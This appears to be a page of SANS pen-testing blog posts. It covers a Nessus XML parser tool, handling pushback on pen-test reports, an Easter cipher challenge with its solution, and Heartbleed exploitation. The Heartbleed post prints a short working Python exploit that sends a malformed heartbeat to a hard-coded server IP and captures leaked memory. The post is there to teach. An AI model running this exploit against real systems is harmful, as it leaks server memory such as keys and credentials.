Data, Data, Everywhere – What to do with Volumes of Nessus Output

[Editor’s note: Here’s a really nice article by Kevin Fiscus on a tool that’ll help you analyze and manage a great deal of Nessus vulnerability scanner output.  This is really helpful, cool stuff!  Thanks, Kevin.  –Ed.]

By Kevin Fiscus

Doing really good, high-value penetration testing is hard. You have to start with a solid, repeatable methodology on which you build a process implemented via tools and techniques. It is a technical endeavor that is, more often than not, remarkably creative.  But, to do it well, you need to understand hacker techniques, cyber defense, protocols, packets, and even people. Sometimes, however, basic logistics get in the way. The problem, in many cases, is that the tools are simply too good, or rather, they give too much information but lack a particularly effective way for a penetration tester to use that information. Case in point: Nessus.

Nessus is a fantastic vulnerability scanner. It has the capability to perform both credentialed and uncredentialed scans of target environments, and test for tens of thousands of vulnerabilities across an enormous range of platforms. For the budget conscious among us, it is also one of the more cost effective commercial solutions on the market. Unfortunately, while superior in many ways, it is not known for its reporting capabilities. Tenable Network Security, the creators of Nessus, have additional products to provide more advanced reporting capabilities, but purchasing them changes the cost structure considerably.

The problem, thus, is one of data overload from any vulnerability scanner, including Nessus. Particularly when performing internal, credentialed scans against network resources, the amount of data generated can be overwhelming. While generally presented in an easy-to-understand format, the data you’ll be given includes each vulnerability individually. Nessus has the capability to view results by IP address or by vulnerability, so identifying the most vulnerable server by vulnerability count or the most common critical severity vulnerability is fairly easy. But what if you wanted to identify the most vulnerable server in terms of the common vulnerability scoring system (CVSS), or wanted to count the number of servers with at least one high or at least one critical severity vulnerability? These things can be difficult within the Nessus interface and are more difficult when looking at Nessus output reports. Fortunately, there are answers for nifty and high-value ways to slice and dice Nessus results.

Nessus has the ability to output reports in a variety of formats, one of which is XML. This has allowed the security community to create tools to parse Nessus results and convert them into a variety of other formats. The one I tend to like can be found at http://www.melcara.com and is called, very originally, “Nessus Parser.” The current version, as of the writing of this posting, is v20a.  And, it’s free.

The Melcara Nessus Parser is a Perl program that converts Nessus XML output into a Microsoft Excel workbook. It doesn’t just create a CSV file with basic scan results, it creates an entire workbook consisting of over TWENTY tabs. A brief tour of at least a few of these tabs will help illustrate the benefits of this tool.

The “Home Worksheet” tab contains summary information about the numbers and counts of vulnerabilities and vulnerable systems as shown below:

The “CVSS Score Total” tab includes, for each IP address scanned, Common Vulnerability Scoring System results and allows you to tune the final scores by introducing a score modifier. By changing the value of a few cells, you can increase the contributing factor of a medium severity from 1 to 1.25, a high severity to 1.5 and a critical to 1.75 (or any value you want). The spreadsheet has been formatted to allow easy sorting on any column.

A series of five tabs labeled Critical, High, Medium, Low, and Informational provide counts and details for each identified vulnerability. For each tab, it lists the type of vulnerability (plugin family), the vulnerability name (plugin name), the number of instances of that vulnerability identified, a description of the vulnerability, the recommended solution, and whether there are exploits for the vulnerability included in Canvas, Metasploit, or Core Impact.  That last tidbit is really cool and helpful for penetration testers looking to move from scanning into outright exploitation of target systems.

The “Device Type” tab provides the IP address, fully qualified domain name, NetBIOS name, and device type for every tested system while the “HostConfigData” tab provides the number of vulnerabilities by severity for each IP address. This tab also provides information about minimum password length, password history length, minimum/maximum password age, complexity requirements and account lockout information if credentialed tests were run. The “portScanData” tab contains information about listening ports and services for each IP address while “InstalledSoftwareData” provides information about software identified to be installed on each target system.

The “UserAccount Data” tab provides information about user accounts found on each tested system, including where the account was found (local or Active Directory), the account name, and the SID and the type of account (e.g. Domain User, Domain Administrator, etc.). This tab also includes information about whether the password for the account has ever been changed, whether the account has been disabled, whether it has ever logged in, and information about certain group membership. Additional tabs provide information about Wireless Access Points and SSIDs detected, passed or failed compliance or policy checks, and various summary information.

Other than the “Home Worksheet”, all of the tabs are formatted to allow for filtering and sorting of the data in any column, and because the data is in Excel, the workbooks can be expanded with graphs, charts, pivot tables, etc. That’s pretty sweet.  Also, got a whole bunch of Nessus results from several scans against several target environments?  The Melcara Nessus Parser can take multiple Nessus XML files as input and tracks, for each row of data presented, which file the results came from. Thus, if you wanted to scan five different locations individually, you could look at their results individually, as a whole, or any subset thereof.
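The two views the article singles out as hard to get from the Nessus interface (the most vulnerable host by modifier-weighted CVSS, and the hosts with at least one High or Critical) can also be computed straight from the .nessus XML. This is an added example, not part of the Melcara parser or anything from melcara.com; SAMPLE_FILES is constructed sample data with placeholder plugin IDs, shaped like Nessus v2 exports and standing in for the directory you would point the parser at with -d.

```python
"""Weighted CVSS totals and severity counts computed straight from .nessus XML.

Added example, not part of the Melcara parser. SAMPLE_FILES holds constructed
sample data shaped like Nessus v2 (.nessus) exports, with placeholder plugin IDs
and RFC 5737 test addresses, standing in for the directory of XML files the
parser is pointed at with -d.
"""
import xml.etree.ElementTree as ET

# Nessus "severity" attribute: 0 Info, 1 Low, 2 Medium, 3 High, 4 Critical
SEVERITY_NAMES = {0: "Informational", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Score modifiers matching the defaults described for the "CVSS Score Total" tab:
# medium 1.25, high 1.5, critical 1.75; low and informational stay unweighted.
DEFAULT_MODIFIERS = {0: 1.0, 1: 1.0, 2: 1.25, 3: 1.5, 4: 1.75}

SAMPLE_FILES = {  # constructed: two separate scan exports, as if from two sites
    "site_a.nessus": """<NessusClientData_v2><Report name="Site A">
 <ReportHost name="192.0.2.10">
  <HostProperties><tag name="host-fqdn">dc01.example.test</tag></HostProperties>
  <ReportItem port="445" protocol="tcp" severity="4" pluginID="900001" pluginName="Placeholder critical SMB flaw" pluginFamily="Windows"><cvss_base_score>10.0</cvss_base_score></ReportItem>
  <ReportItem port="80" protocol="tcp" severity="2" pluginID="900002" pluginName="Placeholder medium web flaw" pluginFamily="Web Servers"><cvss_base_score>5.0</cvss_base_score></ReportItem>
  <ReportItem port="0" protocol="tcp" severity="0" pluginID="900003" pluginName="OS identification" pluginFamily="General"/>
 </ReportHost>
 <ReportHost name="192.0.2.11">
  <ReportItem port="22" protocol="tcp" severity="3" pluginID="900004" pluginName="Placeholder high SSH flaw" pluginFamily="Misc."><cvss_base_score>7.5</cvss_base_score></ReportItem>
  <ReportItem port="22" protocol="tcp" severity="1" pluginID="900005" pluginName="Placeholder low SSH issue" pluginFamily="Misc."><cvss_base_score>2.6</cvss_base_score></ReportItem>
 </ReportHost>
</Report></NessusClientData_v2>""",
    "site_b.nessus": """<NessusClientData_v2><Report name="Site B">
 <ReportHost name="192.0.2.12">
  <ReportItem port="443" protocol="tcp" severity="2" pluginID="900006" pluginName="Placeholder medium TLS issue" pluginFamily="General"><cvss_base_score>4.3</cvss_base_score></ReportItem>
  <ReportItem port="443" protocol="tcp" severity="2" pluginID="900007" pluginName="Placeholder medium web flaw" pluginFamily="Web Servers"><cvss_base_score>5.0</cvss_base_score></ReportItem>
 </ReportHost>
</Report></NessusClientData_v2>""",
}


def parse_nessus(xml_text, source):
    """One row per finding, tagged with the file it came from (as the parser
    does for multi-file input). Informational items usually carry no CVSS score."""
    rows = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        fqdn = host.findtext("HostProperties/tag[@name='host-fqdn']", default="")
        for item in host.iter("ReportItem"):
            rows.append({
                "source": source, "host": host.get("name"), "fqdn": fqdn,
                "severity": int(item.get("severity", "0")),
                "cvss": float(item.findtext("cvss_base_score", default="") or 0),
            })
    return rows


def load_all(files):
    """files: mapping filename -> XML text (a real run would read the -d directory)."""
    rows = []
    for name, text in files.items():
        rows.extend(parse_nessus(text, name))
    return rows


def weighted_cvss_totals(rows, modifiers=DEFAULT_MODIFIERS):
    """Per-host sum of CVSS x severity modifier, the CVSS Score Total view."""
    totals = {}
    for r in rows:
        totals[r["host"]] = totals.get(r["host"], 0.0) + r["cvss"] * modifiers[r["severity"]]
    return totals


def hosts_with_at_least(rows, min_severity):
    """Hosts with at least one finding at min_severity or above
    (3 = at least one High or Critical, 4 = at least one Critical)."""
    return sorted({r["host"] for r in rows if r["severity"] >= min_severity})


def severity_counts(rows):
    """Per-host counts by severity name, like the HostConfigData tab."""
    counts = {}
    for r in rows:
        per_host = counts.setdefault(r["host"], {name: 0 for name in SEVERITY_NAMES.values()})
        per_host[SEVERITY_NAMES[r["severity"]]] += 1
    return counts


if __name__ == "__main__":
    rows = load_all(SAMPLE_FILES)
    for host, total in sorted(weighted_cvss_totals(rows).items(), key=lambda kv: -kv[1]):
        print(f"{host:<12} weighted CVSS {total:6.2f}  {severity_counts(rows)[host]}")
    print("hosts with at least one High/Critical:", hosts_with_at_least(rows, 3))
    print("hosts with at least one Critical:", hosts_with_at_least(rows, 4))
```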

Getting the Nessus Parser to run can be somewhat challenging. You, of course, need to install Perl and there are a whole set of CPAN modules that need to be installed for it to run. That said, it is my experience that the author of the tool is extremely helpful, should you run into problems. Once everything is set up, running the tool is easy and involves these steps:

Step 1: Export the results of your Nessus scans in XML (or .nessus) format
Step 2: Place all the XML files into a directory
Step 3: Execute the command “perl parse_nessus_xml.v20a.pl -d <directory>” where the directory is the location of the XML files.

The parser will look at all of the files in the selected directory, identify those that contain Nessus output, and generate an output report based on provided input. There are a couple of additional command line switches that can be used to control the output:

  • The default output file will be called “nessus_report_XXXXXXXXX” where the X’s will be replaced with date and time information. If you want to change the prefix of “nessus_report” to something else, you do it with the -o option.
  • If you want to run the tool against an individual file instead of a directory, you can use -f <filename> instead of -d <directory>.
  • The -r option allows you to change the severity of individual Nessus plugins by plugin ID.

The Melcara Nessus Parser can be of tremendous value in reviewing, sorting, analyzing and working with Nessus output. As a penetration tester, the ability to identify the most vulnerable targets or to find that one obscure vulnerability is awesome. As a defensive security professional using Nessus to attempt to improve security, the ability to take the output from a scanning tool like Nessus and truly work with the output is amazing.

If you are new to vulnerability scans, Nessus and/or penetration testing in general, or if you have been doing this type of thing for a while and want to take your skills to the next level, you will definitely want to check out SANS SEC560: Network Penetration Testing and Ethical Hacking. This course not only teaches you cool hacker tools and techniques, it also provides you with an industry proven methodology that ensures your penetration tests provide real business value.

–Kevin Fiscus
SANS Certified Instructor

UPDATE: Diligent reader Vikneswaran Kunasegaran (@SecurityBazinga) noticed that the Melcara script didn’t work on Kali Linux (and possibly some Debian systems) due to some missing dependencies.  He wrote a handy little script that automatically pulls down those dependencies and gets your system ready.  You could do what the script does manually, if you’d prefer, or just copy and paste it into a file, chmod it so that it is executable, and run it.  Thanks, Vikneswaran.  Nice work!  Here’s the script:

#!/bin/sh
# Install the CPAN modules the Melcara Nessus Parser needs (Kali / Debian).
# Stop at the first failing command so a missing module is not silently skipped.
set -e

# Refresh the package lists first
sudo apt-get update

# Install the Perl dependencies from CPAN. (cpan takes module names directly;
# Data::Dumper ships with core Perl, so that line is normally a no-op.)
sudo cpan XML::TreePP
sudo cpan Data::Dumper
sudo cpan Math::Round
sudo cpan Excel::Writer::XLSX
sudo cpan Data::Table
sudo cpan Excel::Writer::XLSX::Chart

# Thank you, have fun!

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying-like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions for free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen

Dealing with the Many Stages of Pen Test Result Grief – Part 1

By Ed Skoudis

If you’ve done penetration testing for any length of time, I’m sure you’ve encountered it.  You perform a beautiful penetration test – technically rigorous, focused on real business risk, all wrapped up with a solid report.   You don’t wanna brag, but you feel pretty darned proud of completing a job well done.  And then… it happens (see below).  I’ve been there, my friends, right alongside you.

And then… it happens.  Target system personnel, the very people you’ve labored to help secure, blindside you with a barrage of criticisms of your findings in your draft report.  Some penetration testers are shocked as target system personnel, both business decision makers and the technical people responsible for acting on the pen test findings, reject your results.  It’s almost as though they willfully don’t understand your findings and the associated business risk.  Your findings make perfect sense to you, yet they just don’t get it despite your efforts to explain things as best you can.  And, you still have to turn your draft report into a final report that is meaningful for the target organization.  I’ve been there, my friends, right along side you.  It can be soul crushing.

Over the years, my colleagues and I have developed our pen test methodologies and reporting techniques for avoiding and dealing with these situations.  In this series of articles, we’ll look at a variety of negative responses to penetration testing results often held by target system personnel.  Most important, we’ll discuss how to avoid these issues proactively in the way you conduct the test and report your findings so you can head them off in advance.  And, if they still come up, we’ll offer tips for how to respond to each situation so you can adjust your draft report into a really meaningful, useful final report for the organization.

In this series of articles, we’ll present each of these situations as a stage, analogous to the stages of grief people go through when they suffer a loss.  It’s important to note, however, that not every group of target personnel will move through each and every stage.  Often, people reading your report will fixate on a single stage and linger there.  Your diligence can help them move off of the given stage and onto improving their security stance.

Ultimately, that’s the bottom line – the goal of an effective penetration test is to help organizations improve their security stance in light of real-world threats and attack vectors demonstrating important business risk.  As you’ll see as this series unfolds, we’ll keep coming back to that concept.

Another important note is worth mentioning: it is entirely possible that target system personnel are 100% right about their responses to your findings.  As a pen tester, remember to keep your ego in check and actually listen carefully to target system personnel.  Yes, some of their push back is just the classic stages of grief as we’ll discuss in this series.  But, sometimes, what they tell you is actually real and well founded.  Your intelligently incorporating their responses into finalizing your report for this project and adjusting your approaches for future pen tests will make you a better penetration tester.

Oh, and one last point before we dig in.  Thankfully, whenever issues like this come up, they seldom apply to all findings.  Instead, they apply to just one or two particularly important findings in your penetration test.  Thus, it’s extremely unlikely that you’ll have to use all the techniques we describe in this series for every finding.  Instead, you should use them for your most critical and important findings, those that need action.

OK, with that background, let’s get started by jumping to the single most common reason for rejecting pen test findings: denial.

Stage 1: Denial

Your so-called “vulnerability” is not really there.  In fact, even if the situation you describe is real (which is doubtful), it’s not really a vulnerability, but instead a feature of our environment.

To proactively avoid this kind of claim, make sure your report includes, for each critical or important finding, the following items:

a) A description of the attack steps needed to exploit the finding

b) A description of the business risk (in business terms) associated with the finding, particularly how it could damage the organization’s mission, such as by costing it money, damaging its reputation, inviting regulatory oversight, etc.

c) One or more screenshots showing that the finding is real.  Your screenshot should include annotation with arrows and text pointing to the proof on the screen that the vulnerability is really there.  A picture is worth a thousand words, they say.  Make your screenshot really illustrative that your finding is a problem and poses a business risk.

d) If available, a description of how other organizations suffered from attacks against the given issue.

You don’t have to provide these items for each and every finding, but it’s vital to include them for your critical and important findings, those that you really think require attention and near-term action.

Even if you provide the items described above in your draft report, you may still face target system personnel who play the “denial” game.  If that happens, I recommend you double check the quality of each of the items in the list above, in particular, item b.  Also, make sure item a provides a realistic, step-by-step narrative of how an actual, real-world threat faced by the target organization could exploit the given situation to cause harm.

Additionally, if you still get pushback from target system personnel in the form of denial, consider a brainstorming session with them (either face to face or via conference call) to discuss different remediation recommendations.  It’s often the case that their denial hinges not on your specific finding, but instead on the operational difficulty in implementing and managing your recommended fixes.  If that’s the case, brainstorming about alternative remediation efforts that can still fix the situation while being operationally tenable can help you achieve your overall goal of improving security in a cost-effective manner.  Sometimes, you’ll have to back off on your original recommendation (not your finding, but just the recommendation) and work with target system personnel to come up with clever and artful alternatives that still mitigate the flaw.

Stage 2: We Meant to Do It That Way

We made a conscious business decision to do things this way, so your “finding” is really just underscoring our design decisions.  Thus, your work is unimportant, and we don’t have to take your so-called “discovery” into account; the concept has been baked into our plans since the start.

Ah yes.  This is a classic.  To avoid it proactively, make sure your critical findings include each of the items we discussed in our “denial” segment above.  Even so, this may still come up after you deliver your draft report.  When confronted with this kind of response, remember to maintain your cool and be supportive.  Let them know that you are happy to hear that they anticipated this situation, and that your pen test confirmed it.  I like to use phrases like, “It’s good to see we’re on the same page then” and “Excellent.  Let’s work together to come up with a good mitigation strategy that works for you.”

Then, as before, put together a step-by-step narrative showing how a real threat could exploit this issue causing business harm to the organization.  Suggest a brainstorming call for different remediation tactics.  With this response, it is more likely than ever that the organization really needs help in finding a remediation plan that they can operationalize around.  Your job as a penetration tester is to help them find a practical way to thwart the tactics you used.  I sometimes hear from pen testers this notion: “Look, I’m an offensive guy.  How the heck do I know what to do to defend against this stuff?”  I find such an attitude is most often merely an excuse or a dodge, and I push back.  “You’re a very smart attacker,” I truthfully say, “and I’ll bet you could come up with half a dozen techniques that’ll thwart the tactics you used here.”  Most of the time, the penetration tester agrees.

But, even if you can’t come up with an acceptable and deployable approach yourself, in your mitigation brainstorming conference call or meeting, invite particularly clever and smart operations personnel that you’ve allied with in the target organization to help come up with solutions to your finding.  Those interactions will be like gold as you tailor your final report recommendation to provide maximum value.

In our next installment in this series, we’ll look at Stages 3 and 4 of pen test findings grief: Blame and “That’s not FAIR!”

Read: Part 2 – Dealing with the Many Stages of Pen Test Result Grief

Finally, if you want to learn how to conduct a technically rigorous penetration test using an industry-proven methodology that provides real business value, you may want to check out my SANS Security 560 course, Network Penetration Testing and Ethical Hacking.

It really is the must-have course to amp up your skills to become a GREAT pen tester.  In addition to discussing issues like those in this series, we also perform dozens of in-depth, hands-on labs in which you’ll build great technical skills in recon, scanning, exploitation, post exploitation, and much more.  This class covers professional penetration testing end-to-end, and helps you get ready for conducting excellent pen tests.

–Ed Skoudis
SANS Institute Fellow
SANS Penetration Testing Curriculum Lead
Author and Instructor, SANS Security 560: Network Pen Testing & Ethical Hacking


Winner and Official Answer to Easter Challenge

[Hello, Challenge fans!  Last Friday, we posted a nifty holiday-themed crypto & stego challenge by Chris Andre Dale.  We offer a special thanks to Chris for creating the challenge and for letting us host it.  A whole bunch of people managed to work their way through the challenge and solve it.  But, there were two answers that were particularly noteworthy, and will receive two T-shirts each: a NetWars T-Shirt plus our SANS Pen Test Curriculum T-shirt.

Our  first-place winner, who had the entire correct answer in the shortest time, was Matt Giannetto!  He provided some great code to decipher the message and save the bunny, winning the two T-shirts.  Additionally, we’ll provide a bonus prize (of the two T-shirts) for one of the best write-ups we received, from Thomas Heffron.  His answer was so good, we’ll make it the official answer to the challenge, which follows below.

Thanks again to all who participated!  –Ed.]

SAVING THE EASTER BUNNY

By Tom Heffron

Well, how could anyone not spend a few moments for such a noble pursuit? Besides, what would I tell my kids if I didn’t even try?

So, I start by just looking around the ciphertext and notice the next to last line starts with:

jtgi://ahe.ifglxiflnugbsya.dp/ <– Hmmm… a URL of some sort? A bit of counting characters shows that it has a similar breakdown to:
http://www.securesolutions.no/ <– which is the URL associated with our fine puzzle maker. Is he involved in this evil crime? Interesting…
 
What this does tell us is that the cipher does seem to be a character substitution cipher, but may not be a direct one-to-one replacement. This narrows down the universe of possible ciphers, but doesn’t directly reveal the algorithm. (At least, not to me) I’ll keep that in my back pocket for now…
Moving on to the intercepted audio message, I download and play it with my Linux simple audio player. A few moments of listening indicates this audio track is probably a reverse of the true recording. How can I tell? The best way I can explain this is that each word trails _in_ to a hard ending. Most spoken language begins each word with a clear emphasis at the beginning and trails out at the end of the word or syllable.
After some mad searching around my simple media player, I realize it does not have the sufficient effects to play the recording in reverse. A quick Google search for ‘linux play mp3 in reverse’ delivers a suggestion of Audacity.
Installing that package gave me what I needed with the Effect->Reverse option. Hit play and I hear an interesting (Northern?) European voice reading words that correlate to the NATO phonetic alphabet. (explained at http://en.wikipedia.org/wiki/NATO_phonetic_alphabet) The spoken alphabet writes out to the following string of characters (with a blank space substituted for the spoken ‘break’):
dl dropboxusercontent com u 16108286 kidnappedbunny jpg
and I use some reasonable substitution to turn this into the web URL: http://dl.dropboxusercontent.com/u/16108286/kidnappedbunny.jpg
Drop this into my browser and I see an image of the notorious Con Air movie bad guy, Cyrus ‘The Virus’ Grissom, threatening our furry little friend. Call John Cusack! We must stop these villains and save Easter!
Of course, any good SANS Pen Testing Challenge worth their value would not involve an image without the need to check the exif information. Download image and run:

exiftool ./kidnappedbunny.jpg  – which gives me the following bits of interesting information:
Comment : The ciphertext is created using the famous Vigenere cipher, once considered unbreakable. The key to reveal the cleartext is a combination of the a town located at the X Y coordinates where this picture was taken, and the make of the camera.

GPS Position : 60 deg 23′ 28.54″ N, 5 deg 19′ 19.38″ E

Camera Model Name : XcanteliQ
Let’s break this down piece by piece…
Simply dropping the GPS Location into Google Maps takes us to the town of Bergen, Norway. (Aha! Our puzzle maker is looking more suspicious!)
Add ‘bergen’ to the string from the camera model and I get the key: ‘bergenxcanteliq’
Now, to learn more about Vigenere Cipher, I consult Google Search again with ‘Vigenere Cipher decryption’. Trying the first listing (why not?!) gives a site that is ready to apply this key against the ciphertext. Inserting the necessary information returns the following cleartext:
——————–
congratulations! by successfully deciphering this message you could let the easter police know of the whereabouts of the easter terrorists. the criminals have successfully been apprehended, thanks to you! thanks for your good work, and i hope it was fun. here is the final part of the Easter Challenge:
did you like it? leave a comment and let me know :)
——————–
Success! I seem to have helped save the Easter Bunny! Browsing to the link provided in the cleartext indicated from the comments that I was not the first concerned citizen to help the Easter police. I’ll assume that Mr. Bunny is safe and sound and that the challenge creator was not part of the evil plot!
Thanks to Chris Andre Dale for a fun challenge and to the SANS Pen Testing team for hosting it!
And, finally, to access the password-protected website to get the photo of the safe bunny, you’d enter in a password of the same key (with appropriate case) used to decode the cipher: BergenXcanteliQ  That would reveal the following image:

Easter Challenge – The Mystery of the Missing Easter Bunny

By Chris Andre Dale

The Easter Bunny has been kidnapped, and YOU have to save him! Quickly collect yourself and help save him. Put on your detective hat and start investigating the clues provided.

We managed to intercept a message from the kidnappers.  Unfortunately it seems to be scrambled in some way. We also managed to intercept a ciphered message from one of the criminals and the cipher text below. The cipher text was once considered unbreakable, however newer techniques of cryptanalysis have proven how to beat it. Listen to the intercepted message from the kidnappers, or attack the cipher message. Your choice.

The intercepted message can be played back here: http://securesolutions.no/intercepted%20and%20scrambled%20message.mp3

The cipher text looks like this:

Dsemvnqwlnmmzvi! Cc jagpbussnpwg tfgzvlroknt mlta cfwjgkr vqu phywl bfx kni Rxutrk Tztydi btsj lh tux asmhfesuygp qf gai Piiuii Zieoqrvlxd. Bxf gioqvkclf aegm ivgtkwfcwlyr fpmd btgxiubpdrw, xsidlw ku cbr! Vhngod nes cfav tlqd jhvv, ide M yutr fv wnl jfv. Xfvv ow geg fvgew xqsx fl xub Gafmic Kxbpckrtb: jtgi://ahe.ifglxiflnugbsya.dp/iryxro-ehneppvwf-xyk-qlpveer-sq-bxf-qzywvki-enlxpz-rvree/

Hva aoh emvm yu? Pvgzr x eozfiyb qoh ckx zb mnbp :)

How will you aid the investigation? Anyone with an interest in cryptanalysis might attack the cipher directly, however the rest of us, along with some Google Fu, may start with the intercepted message.

Good luck! The Easter Bunny depends on you!

The first one to email the answer to  PenTestVideo <at> sans.org (yes, that’s the email alias to our team of judges) will win a SANS Pen Test T-Shirt as well as a SANS NetWars T-Shirt!  Please use an e-mail subject of “SAVING THE EASTER BUNNY” for your e-mail at PenTestVideo <at> sans.org.

Best regards,

Chris Andre Dale
Blog: http://www.securesolutions.no
Twitter: http://twitter.com/#!/ChrisAndreDale
LinkedIn: http://no.linkedin.com/in/chrisad
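The decryption that Tom Heffron’s write-up above performs with an online tool, together with the known-plaintext trick behind his URL observation, as an added Python example (not the challenge author’s or the solver’s code). KEY is the key the write-up derives (town name plus camera model, lowercased) and CIPHERTEXT is the challenge text quoted in this post; the implementation assumes the common convention that non-letters pass through without consuming a key letter, which is the convention this ciphertext follows.

```python
"""Vigenere key derivation, decryption and crib-based key recovery for the
Easter Challenge ciphertext above.

Added example, not Chris Andre Dale's or Tom Heffron's code. KEY is the key
the write-up derives (town + camera model, lowercased); CIPHERTEXT is the
challenge text quoted in the post, letter sequence unchanged.
"""
import string

ALPHABET = string.ascii_lowercase

CIPHERTEXT = (
    "Dsemvnqwlnmmzvi! Cc jagpbussnpwg tfgzvlroknt mlta cfwjgkr vqu phywl bfx kni Rxutrk "
    "Tztydi btsj lh tux asmhfesuygp qf gai Piiuii Zieoqrvlxd. Bxf gioqvkclf aegm ivgtkwfcwlyr "
    "fpmd btgxiubpdrw, xsidlw ku cbr! Vhngod nes cfav tlqd jhvv, ide M yutr fv wnl jfv. Xfvv ow "
    "geg fvgew xqsx fl xub Gafmic Kxbpckrtb: jtgi://ahe.ifglxiflnugbsya.dp/iryxro-ehneppvwf-xyk-"
    "qlpveer-sq-bxf-qzywvki-enlxpz-rvree/\n"
    "Hva aoh emvm yu? Pvgzr x eozfiyb qoh ckx zb mnbp :)"
)


def derive_key(town, camera_model):
    """The key the EXIF comment describes: town + camera make, letters only, lowercased."""
    return "".join(c for c in (town + camera_model).lower() if c in ALPHABET)


KEY = derive_key("Bergen", "XcanteliQ")   # -> "bergenxcanteliq"


def vigenere(text, key, decrypt=False):
    """Shift each letter by its key letter. Non-letters pass through unchanged and
    do not consume a key letter (the convention this ciphertext follows);
    case is preserved."""
    if not key:
        raise ValueError("empty key")
    out, k = [], 0
    for ch in text:
        if "a" <= ch.lower() <= "z":
            shift = ALPHABET.index(key[k % len(key)])
            if decrypt:
                shift = -shift
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def letter_offset(text, fragment):
    """Number of letters preceding the first occurrence of `fragment`, i.e. the
    key position (mod key length) at which that fragment was enciphered."""
    return sum(1 for c in text[:text.index(fragment)] if c.isalpha())


def key_from_crib(ciphertext, crib, fragment):
    """Known-plaintext recovery: guessing that ciphertext `fragment` decrypts to
    `crib` yields the key letters used there (ciphertext - plaintext, mod 26).
    The write-up's URL guess (jtgi://ahe. -> http://www.) is exactly such a crib."""
    pos = ciphertext.index(fragment)
    pairs = [(c, p) for c, p in zip(ciphertext[pos:], crib) if p.isalpha()]
    return "".join(ALPHABET[(ALPHABET.index(c.lower()) - ALPHABET.index(p.lower())) % 26]
                   for c, p in pairs)


if __name__ == "__main__":
    print("key:", KEY)
    print(vigenere(CIPHERTEXT, KEY, decrypt=True))
    frag = key_from_crib(CIPHERTEXT, "http://www.", "jtgi://ahe.")
    print("key fragment from URL crib:", frag, "at key position",
          letter_offset(CIPHERTEXT, "jtgi") % len(KEY))
```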

SANS Python Pen Testers | Exploit Heartbleed Vulnerabilities | SEC573

Pen Testers use Python to assess HeartBleed vulnerabilities.

By Mark Baggett

Unless you’ve been living in a cave without access to the outside world, you already know that OpenSSL 1.0.1 suffers from a serious vulnerability that allows a remote attacker to extract data from the memory of a target computer.   The vulnerability was first made “public” (by varying definitions of the word “public”) on April 7th.    The events leading up to the disclosure are interesting.   If you haven’t reviewed them, the Sydney Morning Herald does a great job of outlining the events leading up to the disclosure.  Check it out here:

http://www.smh.com.au/it-pro/security-it/heartbleed-disclosure-timeline-who-knew-what-and-when-20140415-zqurk.html

So while it is clear as mud who knew about the vulnerability and when, it is very clear what happened afterwards.  A lot of people leveraged the power of Python to rapidly develop exploits that demonstrate the seriousness of the vulnerability.

The flaw was made public on April 7th.   Shortly afterward,  several tools were released.   Jared Stafford (jspenguin) wrote the first public proof of concept Python tool to exploit the vulnerability.  His tool called “SSLTEST.PY” was published here, http://s3.jspenguin.org/ssltest.py.  As I write this, that website is unavailable but several copies of his original tool are still available through pastebin.com.  http://pastebin.com/WmxzjkXJ

The exploit was quickly modified and improved by takeshix https://twitter.com/_takeshix.  His version of the tool included support for several application layer protocols that use OpenSSL, such as secure email and SFTP.   His update is called “HB-TEST.PY”   This is probably the most widely used variant of the exploit and it is available here:  https://gist.github.com/takeshixx/10107280#file-hb-test-py

Several other interesting Python penetration testing tools were also published in short order, including a scanner written by Rahul Sasi that looks for vulnerable servers called “HEARTBEAT_SCANNER.PY”  His code is available here:

https://bitbucket.org/fb1h2s/cve-2014-0160/src/bba16b3eedef0e92bd91fea496b00c92eb515e29/Heartbeat_scanner.py?at=master

Peter Wu (aka Lekensteyn) also posted a tool called “PACEMAKER.PY” that can be used to test/exploit client software.  That’s right — client software!  You have to worry about more than just those nasty web servers.  His tool is available here.

https://github.com/Lekensteyn/pacemaker

In no time at all we went from a new vulnerability disclosure all the way up to a wealth of new tools that exploit the vulnerability.  So what do “ssltest.PY”, “hb-test.PY”, “heartbeat_scanner.PY” and “pacemaker.PY” all have in common?  They are all PYTHON PROGRAMS!   Why?  Because Python in pen testing is awesome!  Python is a “rapid deployment”, “batteries included” language.  That means the core set of libraries include everything that you need to perform a wide variety of tasks, including developing exploits.  Most tools only require a few lines of code.  How simple is it to exploit this vulnerability with Python?  You can do it in 7 lines of code.  Check it out:

import socket
# Plain TCP socket to the public demo server (heartbleed.insign.ch) on 443
sh = socket.socket()
sh.connect(("54.217.122.251", 443))
# TLS ClientHello taken from Rahul Sasi's scanner (bytes.fromhex replaces
# Python 2's str.decode('hex'); the socket needs bytes, not str)
sh.send(bytes.fromhex("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000"))
helloresponse = sh.recv(8196)
# Heartbeat request: 3-byte record that declares a 16384-byte payload
sh.send(bytes.fromhex("1803020003014000"))
data = sh.recv(8196)

The code is pretty straightforward.  First, we import the socket module and create a new socket object called “sh”.  We can use this object to connect to, and interact with, a remote server.  Next we use the “sh” object to connect to a remote target by providing an IP address and a port.  In this case, I am targeting a public server that has been set up by Martin Bachmann so you can see how this vulnerability works.  The URL for his server is http://heartbleed.insign.ch.  Then we send the SSL Hello message followed by the Heartbeat message.  In this case, I am transmitting the Hello and Heartbeat packets generated by Rahul Sasi’s scanner that trigger the exploit.   Then we capture the response containing the remote machine memory into a variable called “data”.  That is it!  You’ve exploited the vulnerability and captured the response.
